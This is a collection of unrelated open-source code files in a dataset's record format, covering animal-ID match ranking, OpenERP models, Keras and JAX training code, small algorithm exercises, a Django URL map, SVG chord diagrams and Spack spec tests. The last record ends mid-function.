-1\n skipped_ranks = set([])\n #\n # Record: all_true, missed_true, top_true, bot_true\n topx = 0\n for topx, ttup in enumerate(zip(*true_tup)):\n (aid, score, rank) = ttup\n # Record all true results\n org_true.append(qaid, aid, rank, score)\n # Record non-top (a.k.a problem) true results\n if rank is None or last_rank is None or rank - last_rank > 1:\n if rank is not None:\n 
skipped_ranks.add(rank - 1)\n org_problem_true.append(qaid, aid, rank, score)\n # Record the best results\n if topx == 0:\n org_top_true.append(qaid, aid, rank, score)\n if rank == 0:\n org_rank0_true.append(qaid, aid, rank, score)\n last_rank = rank\n # Record the worse true result\n if topx > 1:\n org_bot_true.append(qaid, aid, rank, score)\n #\n # Record the all_false, false_positive, top_false\n for topx, ftup in enumerate(zip(*false_tup)):\n (aid, score, rank) = ftup\n org_false.append(qaid, aid, rank, score)\n if rank in skipped_ranks:\n org_problem_false.append(qaid, aid, rank, score)\n if topx == 0:\n org_top_false.append(qaid, aid, rank, score)\n if rank == 0:\n org_rank0_false.append(qaid, aid, rank, score)\n\n # -----------------\n # Query result loop\n for qaid, qres in six.iteritems(qaid2_qres):\n if qres is not None:\n _organize_result(qres)\n #print('[rr2] len(org_true) = %r' % len(org_true))\n #print('[rr2] len(org_false) = %r' % len(org_false))\n #print('[rr2] len(org_top_true) = %r' % len(org_top_true))\n #print('[rr2] len(org_top_false) = %r' % len(org_top_false))\n #print('[rr2] len(org_bot_true) = %r' % len(org_bot_true))\n #print('[rr2] len(org_problem_true) = %r' % len(org_problem_true))\n #print('[rr2] len(org_problem_false) = %r' % len(org_problem_false))\n # qaid arrays for ttbttf\n allorg = dict([\n ('true', org_true),\n ('false', org_false),\n ('top_true', org_top_true),\n ('top_false', org_top_false),\n ('bot_true', org_bot_true),\n ('problem_true', org_problem_true),\n ('problem_false', org_problem_false),\n ('rank0_true', org_rank0_true),\n ('rank0_false', org_rank0_false),\n ])\n\n for org in six.itervalues(allorg):\n org.freeze()\n return allorg\n\n\n@profile\ndef get_automatch_candidates(cm_list, ranks_lt=5, directed=True,\n name_scoring=False, ibs=None, filter_reviewed=False,\n filter_duplicate_namepair_matches=False):\n \"\"\"\n THIS IS PROBABLY ONE OF THE ONLY THINGS IN THIS FILE THAT SHOULD NOT BE\n DEPRICATED\n\n Returns a list of matches that should be inspected\n This function is more lightweight than orgres or allres.\n Used in inspect_gui and interact_qres2\n\n Args:\n qaid2_qres (dict): mapping from query annotaiton id to query result object\n ranks_lt (int): put all ranks less than this number into the graph\n directed (bool):\n\n Returns:\n tuple: candidate_matches = (qaid_arr, daid_arr, score_arr, rank_arr)\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-get_automatch_candidates:2\n python -m ibeis.expt.results_organizer --test-get_automatch_candidates:0\n\n Example0:\n >>> # ENABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qreq_ = ibeis.main_helpers.testdata_qreq_()\n >>> cm_list = ibs.query_chips(qreq_=qreq_, return_cm=True)\n >>> ranks_lt = 5\n >>> directed = True\n >>> name_scoring = False\n >>> candidate_matches = get_automatch_candidates(cm_list, ranks_lt, directed, ibs=ibs)\n >>> print(candidate_matches)\n\n Example1:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:5]\n >>> daid_list = ibs.get_valid_aids()[0:20]\n >>> cm_list = ibs.query_chips(qaid_list, daid_list, return_cm=True)\n >>> ranks_lt = 5\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... 
cm_list, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n\n Example3:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:1]\n >>> daid_list = ibs.get_valid_aids()[10:100]\n >>> qaid2_cm = ibs.query_chips(qaid_list, daid_list, return_cm=True)\n >>> ranks_lt = 1\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... cm_list, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n\n Example4:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:10]\n >>> daid_list = ibs.get_valid_aids()[0:10]\n >>> qres_list = ibs.query_chips(qaid_list, daid_list)\n >>> ranks_lt = 3\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... qaid2_cm, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n \"\"\"\n import vtool as vt\n from ibeis.model.hots import chip_match\n print(('[resorg] get_automatch_candidates('\n 'filter_reviewed={filter_reviewed},'\n 'filter_duplicate_namepair_matches={filter_duplicate_namepair_matches},'\n 'directed={directed},'\n 'ranks_lt={ranks_lt},'\n ).format(**locals()))\n print('[resorg] len(cm_list) = %d' % (len(cm_list)))\n qaids_stack = []\n daids_stack = []\n ranks_stack = []\n scores_stack = []\n\n # For each QueryResult, Extract inspectable candidate matches\n if isinstance(cm_list, dict):\n cm_list = list(cm_list.values())\n\n for cm in cm_list:\n if isinstance(cm, chip_match.ChipMatch2):\n daids = cm.get_top_aids(ntop=ranks_lt)\n scores = cm.get_top_scores(ntop=ranks_lt)\n ranks = np.arange(len(daids))\n qaids = np.full(daids.shape, cm.qaid, dtype=daids.dtype)\n else:\n (qaids, daids, scores, ranks) = cm.get_match_tbldata(\n ranks_lt=ranks_lt, name_scoring=name_scoring, ibs=ibs)\n qaids_stack.append(qaids)\n daids_stack.append(daids)\n scores_stack.append(scores)\n ranks_stack.append(ranks)\n\n # Stack them into a giant array\n # utool.embed()\n qaid_arr = np.hstack(qaids_stack)\n daid_arr = np.hstack(daids_stack)\n score_arr = np.hstack(scores_stack)\n rank_arr = np.hstack(ranks_stack)\n\n # Sort by scores\n sortx = score_arr.argsort()[::-1]\n qaid_arr = qaid_arr[sortx]\n daid_arr = daid_arr[sortx]\n score_arr = score_arr[sortx]\n rank_arr = rank_arr[sortx]\n\n if filter_reviewed:\n _is_reviewed = ibs.get_annot_pair_is_reviewed(qaid_arr.tolist(), daid_arr.tolist())\n is_unreviewed = ~np.array(_is_reviewed, dtype=np.bool)\n qaid_arr = qaid_arr.compress(is_unreviewed)\n daid_arr = daid_arr.compress(is_unreviewed)\n score_arr = score_arr.compress(is_unreviewed)\n rank_arr = rank_arr.compress(is_unreviewed)\n\n # Remove directed edges\n if not directed:\n #nodes = np.unique(directed_edges.flatten())\n directed_edges 
= np.vstack((qaid_arr, daid_arr)).T\n #idx1, idx2 = vt.intersect2d_indices(directed_edges, directed_edges[:, ::-1])\n\n unique_rowx = vt.find_best_undirected_edge_indexes(directed_edges, score_arr)\n\n qaid_arr = qaid_arr.take(unique_rowx)\n daid_arr = daid_arr.take(unique_rowx)\n score_arr = score_arr.take(unique_rowx)\n rank_arr = rank_arr.take(unique_rowx)\n\n # Filter Double Name Matches\n if filter_duplicate_namepair_matches:\n qnid_arr = ibs.get_annot_nids(qaid_arr)\n dnid_arr = ibs.get_annot_nids(daid_arr)\n if not directed:\n directed_name_edges = np.vstack((qnid_arr, dnid_arr)).T\n unique_rowx2 = vt.find_best_undirected_edge_indexes(directed_name_edges, score_arr)\n else:\n namepair_id_list = np.array(vt.compute_unique_data_ids_(list(zip(qnid_arr, dnid_arr))))\n unique_namepair_ids, namepair_groupxs = vt.group_indices(namepair_id_list)\n score_namepair_groups = vt.apply_grouping(score_arr, namepair_groupxs)\n unique_rowx2 = np.array(sorted([\n groupx[score_group.argmax()]\n for groupx, score_group in zip(namepair_groupxs, score_namepair_groups)\n ]), dtype=np.int32)\n qaid_arr = qaid_arr.take(unique_rowx2)\n daid_arr = daid_arr.take(unique_rowx2)\n score_arr = score_arr.take(unique_rowx2)\n rank_arr = rank_arr.take(unique_rowx2)\n\n candidate_matches = (qaid_arr, daid_arr, score_arr, rank_arr)\n return candidate_matches\n\n\nif __name__ == '__main__':\n \"\"\"\n CommandLine:\n python -m ibeis.expt.results_organizer\n python -m ibeis.expt.results_organizer --allexamples\n python -m ibeis.expt.results_organizer --allexamples --noface --nosrc\n \"\"\"\n import multiprocessing\n multiprocessing.freeze_support() # for win32\n import utool as ut # NOQA\n ut.doctest_funcs()\n","repo_name":"smenon8/ibeis","sub_path":"_broken/results_organizer.py","file_name":"results_organizer.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"24992729651","text":"from osv import osv\nfrom osv import fields\n\nclass res_partner_crm_analytic(osv.osv):\n \"\"\"\n Define one analytic account by section,\n to disable the analytic account for a section, add line with section and\n not fill the analytic account\n \"\"\"\n _name = 'res.partner.crm.analytic'\n _description = 'CRM Partner Analytic Account'\n\n _columns = {\n 'partner_id': fields.many2one('res.partner', 'Partner', required=True),\n 'crm_model_id': fields.many2one('crm.analytic.timesheet.configuration', 'Model', required=True, help=\"Model of crm\"),\n 'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account',\\\n ondelete='cascade',\\\n help=\"Ananlytic account by default for this model of crm and for this partner\",\\\n domain=\"[('partner_id', '=', partner_id), ('state', '=', 'open'), ('type', '=', 'normal')]\"),\n }\n\nres_partner_crm_analytic()\n\nclass res_partner(osv.osv):\n \"\"\"\n Add a new tab on partner, to select the analytic account by section\n \"\"\"\n _inherit = 'res.partner'\n\n _columns = {\n 'crm_analytic_ids': fields.one2many('res.partner.crm.analytic', 'partner_id', 'CRM Analytic Account'),\n }\n\nres_partner()\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"factorlibre/openerp-extra-6.1","sub_path":"crm_timesheet/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"15378188138","text":"from sys import stdin, stdout \n\ndef 
sumDigits(n):\n n = int(n)\n sum = 0\n while n:\n sum += n % 10\n n //= 10\n return sum\n\ndef main():\n n = -1\n while True:\n n = int(stdin.readline())\n if n == 0:\n break\n status = False\n p = 10\n check = sumDigits(n)\n while not status:\n p += 1\n x = sumDigits(p * n)\n if(x == check):\n status = True\n stdout.write(\"%s\" % p + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"shakeelsamsu/kattis","sub_path":"src/easiest.py","file_name":"easiest.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"29921630143","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import *\nfrom CovidDWNet import CovidDWNet\n\ndef data_load(data_path):\n \n\n \n train_datagen = ImageDataGenerator(rescale=1./255)\n val_datagen = ImageDataGenerator(rescale = 1./255)\n \n \n train_generator = train_datagen.flow_from_directory(data_path+'/train',\n target_size=(128, 128), \n batch_size = 32, \n shuffle = True,class_mode='categorical')\n \n val_generator = val_datagen.flow_from_directory(data_path+'/test',\n target_size=(128, 128),\n batch_size =32,\n shuffle =False,class_mode='categorical')\n return train_generator,val_generator \n \n\ndef train(data_path):\n BS=32\n EPOCHS=200 \n \n train_generator,val_generator=data_load(data_path)\n model = CovidDWNet(inpt_shape = (128, 128, 3), num_class = 4)\n #model.summary() \n \n fname=\"checkpoint/our_model.h5\" \n callbacks = ModelCheckpoint(fname, monitor=\"val_accuracy\", mode=\"max\",\n save_best_only=True, verbose=1)#,save_freq=50*(train_generator.samples//BS))\n callbacks=[callbacks]\n \n H = model.fit_generator(\n train_generator,\n steps_per_epoch=train_generator.samples//BS,\n validation_data=val_generator,\n validation_steps=val_generator.samples//BS,\n epochs=200,\n initial_epoch=0,\n verbose=1,callbacks=callbacks)\n\n\n\nif __name__ == '__main__':\n data_path='data'\n train(data_path)","repo_name":"GaffariCelik/Covid-19","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30548480801","text":"import jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nclass FermiNet(hk.Module):\n def __init__(self, depth, spsize, tpsize, L, init_stddev=0.01):\n super().__init__()\n self.depth = depth\n self.L = L\n self.init_stddev = init_stddev\n self.splayers = [hk.Linear(spsize, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n for _ in range(depth)]\n self.tplayers = [hk.Linear(tpsize, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n for _ in range(depth-1)]\n\n def _spstream0(self, x):\n \"\"\" Initial spstream, with shape (n, spsize0). \"\"\"\n return jnp.zeros_like(x)\n\n def _tpstream0(self, x):\n \"\"\" Initial tpstream, with shape (n, n, tpsize0). 
\"\"\"\n rij = x[:, None, :] - x\n cos_rij, sin_rij = jnp.cos(2*jnp.pi/self.L * rij), jnp.sin(2*jnp.pi/self.L * rij)\n n, _ = x.shape\n dij = jnp.linalg.norm(jnp.sin(jnp.pi/self.L * rij) + jnp.eye(n)[..., None], axis=-1) *(1.0 - jnp.eye(n))\n return jnp.concatenate((cos_rij, sin_rij, dij[..., None]), axis=-1)\n\n def _f(self, spstream, tpstream):\n \"\"\"\n The feature `f` as input to the sptream network.\n `f` has shape (n, fsize), where fsize = 2*spsize + tpsize.\n \"\"\"\n n, _ = spstream.shape\n f = jnp.concatenate((spstream,\n spstream.mean(axis=0, keepdims=True).repeat(n, axis=0),\n tpstream.mean(axis=1)), axis=-1)\n return f\n\n def __call__(self, x):\n spstream, tpstream = self._spstream0(x), self._tpstream0(x)\n\n for i in range(self.depth-1):\n f = self._f(spstream, tpstream)\n if i==0:\n spstream = jax.nn.softplus( self.splayers[i](f) )\n tpstream = jax.nn.softplus( self.tplayers[i](tpstream) )\n else:\n spstream += jax.nn.softplus( self.splayers[i](f) )\n tpstream += jax.nn.softplus( self.tplayers[i](tpstream) )\n\n f = self._f(spstream, tpstream)\n spstream += jax.nn.softplus( self.splayers[-1](f) )\n _, dim = x.shape\n final = hk.Linear(dim, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n return x + final(spstream)\n","repo_name":"fermiflow/CoulombGas","sub_path":"src/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"42560581692","text":"# Zero Matrix\n# Write an algorithm such that if an element in an M x N matrix is 0, its entire row and column are set to 0\n\ndef gen_square_matrix(n):\n return [list(map(lambda x: x+n*i, range(0, n))) for i in range(n)]\n\ndef zero_matrix(matrix):\n m = len(matrix)\n n = 0\n if m > 0:\n n = len(matrix[0])\n i_to_erase = []\n j_to_erase = []\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n i_to_erase.append(i)\n j_to_erase.append(j)\n for i in i_to_erase:\n for j in range(n):\n matrix[i][j] = 0\n for j in j_to_erase:\n for i in range(m):\n matrix[i][j] = 0\n\ndef zero_matrix_opti(matrix):\n m = len(matrix)\n n = 0\n if m > 0:\n n = len(matrix[0])\n first_row_to_erase = 0 in matrix[0] # we will use the first row to mark rows to delete, so we need to remember the state of it\n first_column_to_erase = 0 in [matrix[i][0] for i in range(m)] # idem for first column\n for i in range(1,m):\n for j in range(1,n):\n if matrix[i][j] == 0: # if element = 0, we mark the first column and row for future deletion\n matrix[i][0] = 0\n matrix[0][j] = 0\n for i in range(1,m): # we will erase first row/column after the rest of the matrix\n if matrix[i][0] == 0: # if row marked for deletion\n for j in range(1,n):\n matrix[i][j] = 0\n for j in range(1,n):\n if matrix[0][j] == 0: # we will erase first row/column after the rest of the matrix\n for i in range(1,m): # if column marked for deletion\n matrix[i][j] = 0\n if first_column_to_erase: # now we can put 0 in the first column without altering the rest\n for i in range(m):\n matrix[i][0] = 0\n if first_row_to_erase: # now we can put 0 in the first row without altering the rest\n for j in range(n):\n matrix[0][j] = 0\n\n\nmatrix = gen_square_matrix(5)\nmatrix[0][0] = 1\nmatrix[1][0] = 0\nmatrix[0][4] = 0\nmatrix[2][2] = 0\nzero_matrix_opti(matrix)\nassert matrix == [[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 16, 0, 18, 0], [0, 21, 0, 23, 
0]]","repo_name":"JSchoreels/CrackingTheCodingInterview","sub_path":"Chapter_1_ArraysString/ex_1_8_ZeroMatrix.py","file_name":"ex_1_8_ZeroMatrix.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16292430370","text":"from svg.svgDWG import svgDwg\r\nfrom svg.svgELLIPSE import svgEllipse\r\nfrom svg.svgRECT import svgRect\r\nfrom svg.svgTEXT import svgText\r\nfrom svgConstellation import svgConstellation\r\nfrom svgFretboard import svgFretboard\r\nfrom svgKey import svgKey\r\n\r\n\r\nPIXELS_PER_INCH = 100\r\nHBORDER = 0\r\nVBORDER = 0\r\n\r\nTOP_OFFSET = 0\r\n\r\nFONT_TO_PIXELS = 1.3\r\nHEIGHT_FONT_12 = 12 * FONT_TO_PIXELS\r\n\r\nVERTICAL_OFFSET = 1.2 * PIXELS_PER_INCH\r\n\r\nNUMBER_FRETS = 9\r\n\r\nwidth = 8.5 * PIXELS_PER_INCH - 2 * HBORDER\r\nheight = 11.0 * PIXELS_PER_INCH - 2 * VBORDER\r\n\r\nHORIZONTAL_OFFSET = width/2\r\n\r\ndwg = svgDwg( width , height )\r\n\r\n \r\n \r\n \r\ndiameter = .4 * PIXELS_PER_INCH\r\nxloc = .5 * PIXELS_PER_INCH\r\n\r\ntext_offset = .25 * PIXELS_PER_INCH\r\n\r\nFRETBOARD_OFFSET = 1.0 * PIXELS_PER_INCH\r\nCONSTELLATION_OFFSET = 0.4 * PIXELS_PER_INCH\r\n\r\nCIRCLE_SCALE = .8\r\n\r\n\r\nCHORD_7 = [0,4,7,10]\r\nCHORD_MAJ7 = [0,4,7,11]\r\nCHORD_MIN7B5 = [0,3,6,10]\r\nCHORD_MIN7 = [0,3,7,10]\r\n\r\n\r\n\r\nfret_arrays_all = [\r\n [\r\n ( \"D\" , \"Dm7\" , [ 5,5,3,5] ),\r\n ( \"G\" , \"G7\" , [ 3,5,3,4] ),\r\n ( \"C\" , \"Cmaj7\" , [ 3,3,2,4] ),\r\n ( \"F\" , \"Fmaj7\" , [ 1,3,2,2] ),\r\n ( \"B\" , \"Bm7b5\" , [ 5,5,3,4] ),\r\n ( \"E\" , \"E7\" , [ 0,5,6,4] ),\r\n ( \"A\" , \"Am7\" , [ 3,3,2,2] ),\r\n ],\r\n [\r\n ( \"E\" , \"Em7\" , [ 7,7,5,7] ),\r\n ( \"A\" , \"A7\" , [ 5,7,5,6] ),\r\n ( \"D\" , \"Dmaj7\" , [ 5,5,4,6] ),\r\n ( \"G\" , \"Gmaj7\" , [ 3,5,4,4] ),\r\n ( \"C#\" , \"C#m7b5\" , [ 7,7,5,6] ),\r\n ( \"F#\" , \"F#7\" , [ 2,7,8,6] ),\r\n ( \"B\" , \"Bm7\" , [ 5,5,4,4] ),\r\n ],\r\n ]\r\n\r\nsuffix = [\"iv7\" , \"VII7\" , \"III7\" , \"VII7\" , \"ii7b5\" , \"V7\" , \"i7\"]\r\nchord_pitches = [ CHORD_MIN7 , CHORD_7 , CHORD_MAJ7 , CHORD_MAJ7 , CHORD_MIN7B5 , CHORD_7 , CHORD_MIN7 ]\r\n\r\n\r\nfor idx in range(len(fret_arrays_all)) :\r\n array_idx = 0\r\n \r\n yloc = .75 * PIXELS_PER_INCH\r\n fret_arrays = fret_arrays_all[idx]\r\n for key_idx,text,frets in fret_arrays:\r\n \r\n key = svgKey( key_idx )\r\n pitches = chord_pitches[ array_idx ]\r\n \r\n dwg.add( svgConstellation( CIRCLE_SCALE * diameter ,\r\n xloc + CONSTELLATION_OFFSET ,\r\n yloc ,\r\n pitches ,\r\n key_text = key_idx ))\r\n \r\n dwg.add( svgFretboard( xloc + FRETBOARD_OFFSET ,\r\n yloc - diameter ,\r\n NUMBER_FRETS ,\r\n key.makeChordMatrix( frets ) ,\r\n ))\r\n \r\n text += \" (\" + suffix[ array_idx ] +\")\"\r\n dwg.add( svgText( xloc - text_offset , yloc , text , rotate=270.0 , fontSize = 15 ) )\r\n yloc += VERTICAL_OFFSET\r\n array_idx += 1\r\n xloc += HORIZONTAL_OFFSET\r\n \r\ndwg.draw()\r\n\r\n\r\n ","repo_name":"tcolgan/examples","sub_path":"python/svg/chordsLeavesAmBm.py","file_name":"chordsLeavesAmBm.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12774141643","text":"# count from 1 to 10\n\nnumber = 1\nwhile number <= 10:\n print(number)\n number += 1\n \n# sum of numbers in a list \n\nnumbers = [1, 2, 3, 4, 5]\nsum = 0\nindex = 0\nwhile index < len(numbers):\n sum += numbers[index]\n index += 
1\nprint(sum)","repo_name":"AnantaJoy/Python-for-Geographers-v0.1","sub_path":"13-05-2023/Loops/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37406447502","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('login',views.user_login,name='user_login'),\n path('user_logout',views.user_logout,name='user_logout'),\n path('add_employee',views.add_employee,name='add_employee'),\n path('employee_listing',views.employee_listing,name='employee_listing'),\n path('add_salary',views.add_salary,name='add_salary'),\n path('employee_view/',views.employee_view,name='employee_view'),\n path('employee_update/',views.employee_update,name='employee_update'),\n path('employee_delete/',views.employee_delete,name='employee_delete'),\n]","repo_name":"mohammed-saleek/employee_managment_task","sub_path":"userapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"810856286","text":"'''Counts paths from a point to reach Origin\n\nYou are standing on a point (n, m) and you want to go to origin (0, 0) by taking steps either left or down i.e.\nfrom each point you are allowed to move either in (n-1, m) or (n, m-1). Find the number of paths from point to origin.\n\nExamples:\n\nInput : 3 6\nOutput : Number of Paths 84\n\nInput : 3 0\nOutput : Number of Paths 1'''\n\ndef countPaths(n, m):\n if n == 0 or m == 0:\n return 1\n return countPaths(n-1, m) + countPaths(n, m-1)\n\n#Another approach\ndef countPaths(n, m):\n\n dp = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for i in range(0, n+1):\n for j in range(0, m+1):\n if i == 0 or j == 0:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[n][m]\n\n\nn = 3\nm = 2\nprint(\" Number of Paths \", countPaths(n, m))\n\nn = 3\nm = 6\nprint(\" Number of Paths \", countPaths(n, m))\n\nn = 3\nm = 0\nprint(\" Number of Paths \", countPaths(n, m))\n","repo_name":"Saima-Chaity/Leetcode","sub_path":"Geekforgeeks/Counts paths from a point to reach Origin.py","file_name":"Counts paths from a point to reach Origin.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72497472189","text":"import json, bge\n\nvideo_playback_list = []\nlow_frequency_callbacks = []\nheight_frequency_callbacks = []\n\nLOW_FREQUENCY_TICK = 0.06\nHEIGHT_FREQUENCY_TICK = 0.02\n\nproject_data = None\n\ndef loadProjectFile():\n\tpath = bge.logic.expandPath('//../project.json')\n\n\tglobal project_data\n\ttry:\n\t\twith open(path) as json_file: project_data = json.load(json_file)\n\texcept Exception as e: \n\t\tprint(str(e))\n\t\t\ndef __init__():\n\tloadProjectFile()\n\t\n__init__()","repo_name":"elmeunick9/UPBGE-CommunityAddon","sub_path":"project/core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"23528457781","text":"import spack.architecture\nfrom spack.spec import *\nfrom spack.test.mock_packages_test import *\n\n\nclass SpecSematicsTest(MockPackagesTest):\n \"\"\"This tests satisfies(), constrain() and other semantic operations\n on specs.\"\"\"\n\n # ========================================================================\n # Utility functions to set 
everything up.\n # ========================================================================\n def check_satisfies(self, spec, anon_spec, concrete=False):\n left = Spec(spec, concrete=concrete)\n try:\n right = Spec(anon_spec) # if it's not anonymous, allow it.\n except:\n right = parse_anonymous_spec(anon_spec, left.name)\n\n # Satisfies is one-directional.\n self.assertTrue(left.satisfies(right))\n self.assertTrue(left.satisfies(anon_spec))\n\n # if left satisfies right, then we should be able to consrain\n # right by left. Reverse is not always true.\n right.copy().constrain(left)\n\n def check_unsatisfiable(self, spec, anon_spec, concrete=False):\n left = Spec(spec, concrete=concrete)\n try:\n right = Spec(anon_spec) # if it's not anonymous, allow it.\n except:\n right = parse_anonymous_spec(anon_spec, left.name)\n\n self.assertFalse(left.satisfies(right))\n self.assertFalse(left.satisfies(anon_spec))\n\n self.assertRaises(UnsatisfiableSpecError, right.copy().constrain, left)\n\n def check_constrain(self, expected, spec, constraint):\n exp = Spec(expected)\n spec = Spec(spec)\n constraint = Spec(constraint)\n spec.constrain(constraint)\n self.assertEqual(exp, spec)\n\n def check_constrain_changed(self, spec, constraint):\n spec = Spec(spec)\n self.assertTrue(spec.constrain(constraint))\n\n def check_constrain_not_changed(self, spec, constraint):\n spec = Spec(spec)\n self.assertFalse(spec.constrain(constraint))\n\n def check_invalid_constraint(self, spec, constraint):\n spec = Spec(spec)\n constraint = Spec(constraint)\n self.assertRaises(UnsatisfiableSpecError, spec.constrain, constraint)\n\n # ========================================================================\n # Satisfiability\n # ========================================================================\n def test_satisfies(self):\n self.check_satisfies('libelf@0.8.13', '@0:1')\n self.check_satisfies('libdwarf^libelf@0.8.13', '^libelf@0:1')\n\n def test_satisfies_namespace(self):\n self.check_satisfies('builtin.mpich', 'mpich')\n self.check_satisfies('builtin.mock.mpich', 'mpich')\n\n # TODO: only works for deps now, but shouldn't we allow for root spec?\n # self.check_satisfies('builtin.mock.mpich', 'mpi')\n\n self.check_satisfies('builtin.mock.mpich', 'builtin.mock.mpich')\n\n self.check_unsatisfiable('builtin.mock.mpich', 'builtin.mpich')\n\n def test_satisfies_namespaced_dep(self):\n \"\"\"Ensure spec from same or unspecified namespace satisfies namespace\n constraint.\"\"\"\n self.check_satisfies('mpileaks ^builtin.mock.mpich', '^mpich')\n\n self.check_satisfies('mpileaks ^builtin.mock.mpich', '^mpi')\n self.check_satisfies(\n 'mpileaks ^builtin.mock.mpich', '^builtin.mock.mpich')\n\n self.check_unsatisfiable(\n 'mpileaks ^builtin.mock.mpich', '^builtin.mpich')\n\n def test_satisfies_compiler(self):\n self.check_satisfies('foo%gcc', '%gcc')\n self.check_satisfies('foo%intel', '%intel')\n self.check_unsatisfiable('foo%intel', '%gcc')\n self.check_unsatisfiable('foo%intel', '%pgi')\n\n def test_satisfies_compiler_version(self):\n self.check_satisfies('foo%gcc', '%gcc@4.7.2')\n self.check_satisfies('foo%intel', '%intel@4.7.2')\n\n self.check_satisfies('foo%pgi@4.5', '%pgi@4.4:4.6')\n self.check_satisfies('foo@2.0%pgi@4.5', '@1:3%pgi@4.4:4.6')\n\n self.check_unsatisfiable('foo%pgi@4.3', '%pgi@4.4:4.6')\n self.check_unsatisfiable('foo@4.0%pgi', '@1:3%pgi')\n self.check_unsatisfiable('foo@4.0%pgi@4.5', '@1:3%pgi@4.4:4.6')\n\n self.check_satisfies('foo %gcc@4.7.3', '%gcc@4.7')\n self.check_unsatisfiable('foo %gcc@4.7', 
'%gcc@4.7.3')\n\n def test_satisfies_architecture(self):\n self.check_satisfies(\n 'foo platform=test target=frontend os=frontend',\n 'platform=test target=frontend os=frontend')\n self.check_satisfies(\n 'foo platform=test target=backend os=backend',\n 'platform=test target=backend', 'platform=test os=backend')\n self.check_satisfies(\n 'foo platform=test target=default_target os=default_os',\n 'platform=test target=default_target os=default_os')\n\n def test_satisfies_dependencies(self):\n self.check_satisfies('mpileaks^mpich', '^mpich')\n self.check_satisfies('mpileaks^zmpi', '^zmpi')\n\n self.check_unsatisfiable('mpileaks^mpich', '^zmpi')\n self.check_unsatisfiable('mpileaks^zmpi', '^mpich')\n\n def test_satisfies_dependency_versions(self):\n self.check_satisfies('mpileaks^mpich@2.0', '^mpich@1:3')\n self.check_unsatisfiable('mpileaks^mpich@1.2', '^mpich@2.0')\n\n self.check_satisfies(\n 